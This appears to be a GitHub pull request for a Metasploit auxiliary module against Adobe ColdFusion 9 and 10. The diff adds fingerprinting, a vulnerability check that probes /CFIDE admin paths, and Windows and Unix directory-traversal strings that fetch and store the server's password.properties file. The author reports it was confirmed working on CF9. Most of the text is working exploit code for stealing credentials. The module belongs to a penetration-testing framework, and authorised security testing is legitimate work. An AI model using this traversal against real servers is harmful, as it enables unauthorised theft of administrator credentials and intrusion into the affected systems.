### PR TITLE
Updates for auxiliary/gather/coldfusion_pwd_props

### DIFF
--- a/modules/auxiliary/gather/coldfusion_pwd_props.rb
+++ b/modules/auxiliary/gather/coldfusion_pwd_props.rb
@@ -29,7 +29,8 @@ class Metasploit3 < Msf::Auxiliary
 			'Author'         =>
 				[
 					'HTP',
-					'sinn3r'
+					'sinn3r',
+					'nebulus'
 				],
 			'License'        => MSF_LICENSE,
 			'Actions'     =>
@@ -43,7 +44,8 @@ class Metasploit3 < Msf::Auxiliary
 
 		register_options(
 			[
-				Opt::RPORT(8500),
+				Opt::RPORT(80),
+				OptBool.new('CHECK', [false, 'Only check for vulnerability', false]),
 				OptString.new("TARGETURI", [true, 'Base path to ColdFusion', '/'])
 			], self.class)
 	end
@@ -52,14 +54,136 @@ class Metasploit3 < Msf::Auxiliary
 		"#{datastore['RHOST']}:#{datastore['RPORT']}"
 	end
 
+	def fingerprint(response)
+
+		if(response.headers.has_key?('Server') )
+			if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
+				os = "Windows (#{response.headers['Server']})"
+			elsif(response.headers['Server'] =~ /Apache\//)
+					os = "Unix (#{response.headers['Server']})"
+			else
+				os = response.headers['Server']
+			end
+		end
+
+		return nil if response.body.length < 100
+
+		title = "Not Found"
+		response.body.gsub!(/[\r\n]/, '')
+		if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/i)
+			title = $1
+			title.gsub!(/\s/, '')
+		end
+		return nil  if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/)
+
+		out = nil
+
+		if(response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
+			v = $1
+			out = (v =~ /^6/) ? "Adobe ColdFusion MX6 (Not Vulnerable)" : "Adobe ColdFusion MX7 (Not Vulnerable)"
+		elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ )
+			out = "Adobe ColdFusion MX7 (Not Vulnerable)"
+		elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
+			out = "Adobe ColdFusion 8 (Not Vulnerable)"
+		elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
+			response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/)
+			out = "Adobe ColdFusion 9"
+		elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
+			out = $1.split(/,/)[0]
+		else
+			out = 'Unknown ColdFusion'
+		end
+
+		if(title.downcase == 'coldfusionadministrator')
+			out << " (you have administrator access)"
+		end
+
+		out << " (#{os})"
+		file = ''
+		trav = ''
+		if(os =~ /Windows/ )
+			trav = '..\..\..\..\..\..\..\..\..\..'
+			file = (out =~ /ColdFusion 9/) ? '\ColdFusion9\lib\password.properties' : '\ColdFusion10\CFusion\lib\password.properties'
+		else
+			trav = '../../../../../../../../../..'
+			file = (out =~ /ColdFusion 9/) ? '/opt/coldfusion9/lib/password.properties' : '/opt/coldfusion10/cfusion/lib/password.properties'
+		end
+
+		if(response.body =~ /Adobe/ and response.body =~ /ColdFusion/ and file == '')
+			print_error("#{peer} Fingerprint failed...aborting")
+			print_status("response: #{response.body}")
+			return nil,nil
+		end
+
+		return out,"#{trav}#{file}"
+	end
+
+	def check
+		vuln = false
+		url = '/CFIDE/adminapi/customtags/l10n.cfm'
+		res = send_request_cgi({
+				'uri' => url,
+				'method' => 'GET',
+				'Connection' => "keep-alive",
+				'Accept-Encoding' => "zip,deflate",
+				})
+
+		if(res != nil)
+		# can't stack b/c res.code won't exist if res is nil
+			vuln = true if(res.code == 500 and res.body =~ /attributes\.id was not provided/)
+		end
+
+		if(vuln)
+			url = '/CFIDE/administrator/mail/download.cfm'
+			res = send_request_cgi({
+					'uri' => url,
+					'method' => 'GET',
+					'Connection' => "keep-alive",
+					'Accept-Encoding' => "zip,deflate",
+					})
+			if(res != nil)
+				vuln = false if (res.code != 200)
+			end
+		end
+
+		return vuln
+	end
+
+
 	def run
 		filename = ""
-		case action.name
-			when 'ColdFusion10'
-				filename = "../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties"
-			when 'ColdFusion9'
-				filename = "../../../../../../../../../../../../../../../opt/coldfusion9/lib/password.properties"
+
+		url = '/CFIDE/administrator/index.cfm'
+#		print_status("Getting index...")
+		res = send_request_cgi({
+				'uri' => url,
+				'method' => 'GET',
+				'Connection' => "keep-alive",
+				'Accept-Encoding' => "zip,deflate",
+				})
+#		print_status("Got back: #{res.inspect}")
+		return if not res
+		return if not res.body or not res.code
+		return if not res.code.to_i == 200
+
+		out, filename = fingerprint(res)
+		print_status("#{peer} #{out}") if out
+
+		if(out =~ /Not Vulnerable/) 
+			print_status("#{peer} isn't vulnerable to this attack")
+			return
 		end
+
+		if(not check)
+			print_status("#{peer} can't be exploited (either files missing or permissions block access)")
+			return
+		end
+
+		if (datastore['CHECK'] )
+			print_good("#{peer} is vulnerable and most likely exploitable") if check
+			return
+		end
+
 
 		res = send_request_cgi({
 			'method'   => 'GET',
@@ -102,5 +226,4 @@ class Metasploit3 < Msf::Auxiliary
 		p = store_loot('coldfusion.password.properties', 'text/plain', rhost, res.body)
 		print_good("#{peer} - password.properties stored in '#{p}'")
 	end
-
 end


### PR DESCRIPTION
The original version traversal will only work in Unix... (../../ vs ....)

The changes borrow from the auxilary/scanner/http/cold_fusion_version module with slight tweaks since only CF9/CF10 are vulnerable to perform fingerprinting to determine whether windows/unix and to get paths right.  I didn't have a CF10 page to test / get a fingerprint from, but the traversal will still get set right b/c it checks on CF9 and defaults to CF10 if not.  I also set RPORT to 80 b/c at least on all the ones I found to test, they were not running on the dedicated port (8500) but rather under the main webserver.

Confirmed working on CF9 pages.
